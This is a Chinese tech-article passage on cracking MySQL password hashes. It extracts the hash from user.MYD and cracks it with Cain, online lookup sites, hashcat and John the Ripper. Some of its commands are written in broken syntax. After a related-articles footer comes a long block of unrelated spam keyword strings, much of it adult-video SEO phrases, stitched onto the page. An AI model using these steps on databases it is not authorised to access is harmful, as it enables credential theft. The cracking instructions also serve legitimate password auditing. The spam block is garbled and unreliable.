六、MySQL 密碼破解

1、Cain 工具破解 MySQL 密碼

使用 UltraEdit-32 編輯器直接打開 user.MYD 文件,打開后使用二進制模式進行查看,在 Root 用戶后面是一串字符串,選中這些字符串將其復制到記事本中,這些字符串即為用戶加密值,例如 506D1427F6F61696B4501445C90624897266DAE3。

注意:

  • root 后面的“*”不要復制到字符串中。
  • 在有些情況下需要往后面看看,否則得到的不是完整的 MYSQLSHA1 密碼,總之其正確的密碼位數是 40 位。

安裝 cain 工具,使用 cracker,右鍵單擊“Add tolist”將 MySQL Hashes 值加入到破解列表中,使用軟件中的字典、暴力破解等方式來進行暴力破解。

2、網站在線密碼破解

  • cmd5.com 破解。將獲取的 MySQL 值放在 cmd5.com 網站中進行查詢,MySQL 密碼一般都是收費的;
  • somd5.com 破解。Somd5.com 是后面出現的一個免費破解網站,每次破解需要手工選擇圖形碼進行破解,速度快,效果好,只是每次只能破解一個,而且破解一次后需要重新輸入驗證碼。

3、Oclhash 破解

Hashcat 支持很多種破解算法,免費開源軟件,官方網站 https://hashcat.net/hashcat/,破解命令

 

  1. hashcat64.exe -m 200myql.hashpass.dict //破解MySQL323類型  
  2. hashcat64.exe -m 300myql.hashpass.dict //破解MySQL4.1/MySQL5類型

4、John the Ripper password cracker

John the Ripper 下載地址:http://www.openwall.com/john/h/john179w2.zip,John the Ripper 除了能夠破解 linux 外,還能破解多種格式的密碼

 

  1. Echo *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B>hashes.txt  
  2. John –format =mysql-sha1 hashes.txt  
  3. john --list=formats | grep mysql //查看支持mysql密碼破解的算法  

 

責任編輯:龐桂玉 來源: 數據庫開發
相關推薦

2011-05-18 13:50:34

MySQL數據庫網絡安全

2020-08-07 08:04:03

數據庫MySQL技術

2021-09-15 09:51:36

數據庫架構技術

2011-07-29 15:58:53

SGAOracle

2010-05-12 15:41:21

MySQL數據庫

2010-05-21 13:34:53

MySQL數據庫

2019-06-11 09:49:25

2011-03-10 13:19:47

Oracle數據庫

2011-08-03 17:43:53

MySQL數據庫外鍵約束

2011-09-01 15:39:43

QT數據庫

2018-07-27 18:20:31

數據庫MySQL 數據庫建表

2011-08-01 13:59:22

Oracle數據庫命名空間

2010-08-31 14:13:48

DB2數據庫

2010-12-21 18:09:48

2020-07-06 14:20:43

MongoDB數據庫安全

2011-07-27 15:01:48

MySQL數據庫內存表

2011-08-25 14:50:42

SQL Server數常用操作

2021-09-07 10:12:25

分布式數據庫集群

2011-03-21 13:41:20

數據庫開發規范

2010-05-18 10:47:52

點贊
收藏

51CTO技術棧公眾號

91精品动漫在线观看| 黄色成人在线视频| 久久影院午夜论| 国产精品一区=区| 欧美激情图片小说| 噜噜噜狠狠夜夜躁精品仙踪林| 高潮白浆女日韩av免费看| 亚洲国产成人不卡| 好男人www在线视频| 久久久久一区| 欧美成人性生活| 少妇久久久久久久久久| 欧美电影院免费观看| 色欧美片视频在线观看| 日本国产中文字幕| 手机看片福利永久| 久草精品在线观看| 国产成+人+综合+亚洲欧洲| 丰满少妇被猛烈进入一区二区| 亚洲大片精品免费| 日韩欧美自拍偷拍| 亚洲综合在线网站| 17videosex性欧美| 中文字幕日韩一区| 另类的小说在线视频另类成人小视频在线 | 日韩视频三区| 久久精品久久久久电影| caopor在线| 中文字幕在线视频网站| 一区二区三区视频在线观看| 天堂av一区二区| 婷婷丁香花五月天| 高潮精品一区videoshd| 92看片淫黄大片看国产片| 亚洲av无码乱码国产精品fc2| 伊人影院久久| 久久97精品久久久久久久不卡| 欧美xxxx精品| 欧美日韩中文字幕一区二区三区| 亚洲国产精品久久91精品| 99精品视频免费版的特色功能| 素人一区二区三区| 在线免费观看日韩欧美| 国产午夜福利视频在线观看| 超级碰碰不卡在线视频| 亚洲精品第一国产综合野| 在线成人av电影| 99视频在线观看地址| 久久久久久免费网| 奇米影视首页 狠狠色丁香婷婷久久综合 | 国产综合一区二区| 成人黄色在线观看| 国产又大又黄又爽| 激情小说亚洲一区| 成人欧美一区二区三区黑人孕妇| 中文字幕777| 蜜桃在线一区二区三区| 国产精品久久一区| 这里只有精品国产| 韩国av一区二区三区四区| 成人久久一区二区| 精品欧美在线观看| 丁香网亚洲国际| 国产一区二区免费电影| 天天综合在线视频| 国产亚洲一区二区在线观看| 日产国产精品精品a∨| 1pondo在线播放免费| 中文字幕在线播放不卡一区| 青少年xxxxx性开放hg| 亚洲丝袜一区| 黄色一区二区在线| 波多野结衣天堂| www.欧美视频| 日韩精品一区二区三区四区视频| 熟妇高潮一区二区| 亚洲香蕉视频| 色老头一区二区三区| 欧美激情图片小说| 亚洲欧美日韩一区在线观看| 国产精品久久久久久av福利软件| 夜夜躁很很躁日日躁麻豆| www.久久av| 欧美色999| 91精品免费在线| 欧美激情一区二区三区p站| 日韩av不卡一区| 亚洲最新av在线| 亚洲色婷婷一区二区三区| 国内自拍一区| 国产精品video| av网站在线观看免费| 99热国产精品| 亚洲欧美久久久久一区二区三区| 亚洲妇熟xxxx妇色黄| 欧美色另类天堂2015| 国产无遮挡猛进猛出免费软件| 一区二区三区在线资源| 一区二区三区四区在线观看视频 | 日本激情一区二区三区| 久久精品亚洲精品国产欧美| 中国黄色录像片| 高清不卡亚洲| 欧美xxx久久| 三区四区在线观看| 精品动漫3d一区二区三区免费| 国产成人黄色av| 午夜精品无码一区二区三区| 国产亚洲精品7777| 久久久久99精品成人片| a∨色狠狠一区二区三区| 精品福利av导航| 很污很黄的网站| 老鸭窝91久久精品色噜噜导演| 91欧美精品午夜性色福利在线 | 在线观看色网站| 99精品久久只有精品| 9l视频自拍9l视频自拍| 亚洲电影有码| 亚洲精品久久久久久久久久久久| 国产日产精品一区二区三区的介绍| 免费视频久久| 国产麻豆乱码精品一区二区三区| 麻豆视频在线播放| 91福利精品视频| 亚洲精品在线视频免费观看| 欧美阿v一级看视频| 91精品美女在线| jizz视频在线观看| 一本大道久久a久久综合婷婷 | 99热这里只有精品5| 国产欧美日韩另类视频免费观看| 久久国产精品视频在线观看| 欧一区二区三区| 久久精品久久久久久| 夜夜爽8888| 国产精品免费av| 亚洲第一中文av| 国内精品伊人久久久| 欧美专区在线观看| 香蕉av一区二区三区| 亚洲成人午夜电影| www.黄色网| 伊人成人在线| 成人免费在线一区二区三区| 天使と恶魔の榨精在线播放| 欧美一区二区精品久久911| 国产在线免费看| 国产一区二区三区久久悠悠色av | 2021av在线| 欧美日本在线播放| 顶级黑人搡bbw搡bbbb搡| 美女性感视频久久| 综合久久国产| 日本一区影院| 久久久久久美女| 日韩在线观看视频一区| 天天色天天操综合| 瑟瑟视频在线观看| 蜜臀av在线播放一区二区三区| 性欧美精品一区二区三区在线播放| 韩日精品一区| 欧美成人午夜剧场免费观看| 黄色aaa毛片| 狠狠色噜噜狠狠狠狠97| 怡红院一区二区三区| 麻豆精品蜜桃视频网站| 日韩视频在线免费播放| 国语精品视频| 午夜精品美女自拍福到在线| 天堂a中文在线| 欧美性大战久久久久久久| 国产3级在线观看| 国产不卡免费视频| 丰满爆乳一区二区三区| 欧美色图一区| 97超碰人人看人人| 亚洲国产欧美日本视频| 少妇av一区二区三区| 国产喷水吹潮视频www| 性久久久久久久久久久久 | 亚洲美女少妇撒尿| 国产a级黄色片| 日本不卡123| www.男人天堂网| 真实原创一区二区影院| 国产日韩欧美视频| 538在线观看| 中文国产亚洲喷潮| 后入内射欧美99二区视频| 欧美综合久久久| 久久久久免费看| 国产欧美日韩视频在线观看| 无码人妻久久一区二区三区蜜桃| 久久激情一区| 97在线免费视频观看| 国产欧美高清视频在线| 51国偷自产一区二区三区| www.日韩| 欧美激情xxxx性bbbb| 成人免费高清在线播放| 亚洲成人精品久久久| 亚洲天堂国产精品| 精品福利在线视频| 五月天色婷婷丁香| 欧美国产精品劲爆| 精品熟女一区二区三区| 久久99国产精品尤物| 国产精品视频一区二区三区四区五区| 99久久综合狠狠综合久久aⅴ| 精品蜜桃一区二区三区| 精品一区二区三区四区五区| 国产成人中文字幕| gogo高清在线播放免费| 久久精品国产99国产精品澳门 | 久久丝袜美腿综合| 免费看91视频| 国产一区二区在线观看免费| 成人性生生活性生交12| 一区二区三区福利| 菠萝蜜视频在线观看入口| 欧美疯狂party性派对| 日韩高清国产精品| 婷婷成人综合| 国产一区二区自拍| 亚洲精品在线播放| 亚洲va男人天堂| 日韩精品一级毛片在线播放| 国产ts人妖一区二区三区| xxxx视频在线| 久久久久久久久91| 2024短剧网剧在线观看| 日韩有码在线观看| 永久免费在线观看视频| 一区二区三区 在线观看视| 日本大臀精品| 亚洲免费小视频| 日韩国产福利| 日韩极品精品视频免费观看| 五月天激情开心网| 亚洲国产精品悠悠久久琪琪| 免费国产羞羞网站视频| 精品乱人伦小说| 亚洲免费一级片| 精品美女一区二区三区| 少妇精品高潮欲妇又嫩中文字幕 | 99精品免费视频| 男人添女荫道口图片| 国产精品第十页| 18禁裸男晨勃露j毛免费观看| 欧美日韩免费观看一区=区三区| 福利在线小视频| 国产精品a级| 久久久久久免费看| 国产毛片久久| 欧美污视频网站| 日韩高清在线观看| 亚洲精品久久久中文字幕| 久久丁香综合五月国产三级网站| 亚洲欧美国产中文| 国产精品自拍在线| 国产艳妇疯狂做爰视频| 99re这里只有精品首页| 国产交换配乱淫视频免费| 国产欧美一区二区精品久导航| 成人午夜剧场视频网站| 国产精品视频看| 日本在线一级片| 午夜精品123| 亚洲 日本 欧美 中文幕| 欧美日韩精品系列| 亚洲精品18在线观看| 亚洲国产精品系列| av中文在线| 欧美大片在线看| 在线观看的黄色| 国产一区二区在线免费| 中文字幕av一区二区三区四区| 国产午夜精品在线| 欧美三级三级| 六月婷婷激情综合| 老司机午夜免费精品视频 | 国产女优在线播放| 日韩一级免费一区| 四虎影院在线播放| 久久精品一本久久99精品| 2021天堂中文幕一二区在线观| 国产精品igao视频| 7777精品| 亚洲成人蜜桃| 亚洲激情在线| 久久黄色片网站| 99re热这里只有精品免费视频 | 亚洲国产精品久久一线不卡| 亚洲黄网在线观看| 日韩一区二区三区视频| 欧美婷婷久久五月精品三区| 超碰97人人做人人爱少妇| 日韩伦理在线| 91国产丝袜在线放| 欧美一级精品片在线看| 国产精品无码免费专区午夜| 免费视频久久| 韩国av中国字幕| 久久久久久黄色| 国产精品成人网站| 91精品国产乱码| 国产精品久久一区二区三区不卡| 欧美精品aaa| 亚洲三级电影| 日韩欧美一区二区三区四区五区| 伊人天天综合| 男人添女人荫蒂国产| 亚洲国产高清aⅴ视频| 久久艹免费视频| 日韩精品一区二区三区中文精品| 麻豆免费在线视频| 国产成人精品久久二区二区| 国产成人在线中文字幕| 久久久成人精品一区二区三区 | av av在线| 亚洲男人的天堂在线观看| 最近中文字幕在线观看| 亚洲人成伊人成综合网久久久| av男人的天堂在线观看| 91成人伦理在线电影| 午夜精品一区二区三区国产| 成人中文字幕av| 国产亚洲精品aa午夜观看| 特级毛片www| 亚洲精品一区av在线播放| 爱情岛论坛亚洲品质自拍视频网站| 91国产在线播放| 欧美私人啪啪vps| 黄色a级三级三级三级| ...xxx性欧美| 国产精品久久久久久在线| 中文字幕亚洲无线码在线一区| 97久久香蕉国产线看观看| 欧美xxxx黑人又粗又长精品| 亚洲人体大胆视频| 人妻互换一二三区激情视频| 一区二区三区在线播放| www.成人在线观看| 九九热这里只有精品免费看| 日本免费精品| www.av蜜桃| 99国产精品久久久久久久久久久| 国产超碰人人爽人人做人人爱| 日韩h在线观看| 欧美一级大黄| 日韩欧美亚洲区| 久久99精品国产麻豆婷婷| 久久av红桃一区二区禁漫| 欧美一区二区在线免费播放| 99在线视频观看| 国产精品久久亚洲7777| 国产日韩精品视频一区二区三区| 少妇精品一区二区三区| 91成人国产精品| 午夜在线小视频| 91精品国产99久久久久久红楼| 黄色av成人| 全黄一级裸体片| 欧美日韩国产另类不卡| 在线免费观看的av| 精品在线观看一区二区| 日韩二区在线观看| 亚洲色偷偷综合亚洲av伊人| 日韩精品一区二区三区视频| 天堂在线中文网官网| 亚洲一区二区三区涩| 国产+成+人+亚洲欧洲自线| 奇米影视第四色777| 国产一区二区三区毛片| 久久精品一级| heyzo国产| 亚洲人成网站在线| 同心难改在线观看| 国产日韩欧美综合| 亚洲美女黄网| 91视频免费在观看| 精品欧美黑人一区二区三区| 波多野结衣亚洲| 成人性做爰片免费视频| 91美女精品福利| 国产精品一级二级| 5278欧美一区二区三区| 国产精品久久久久久影院8一贰佰| 最新中文字幕日本| 欧美在线你懂得| 免费电影视频在线看| 婷婷久久青草热一区二区| 国产福利视频一区二区三区| 亚洲无码精品一区二区三区| 欧美成人午夜激情在线| 欧美色图在线播放| 欲求不满的岳中文字幕| 7777精品伊人久久久大香线蕉经典版下载 | 亚洲自拍小视频|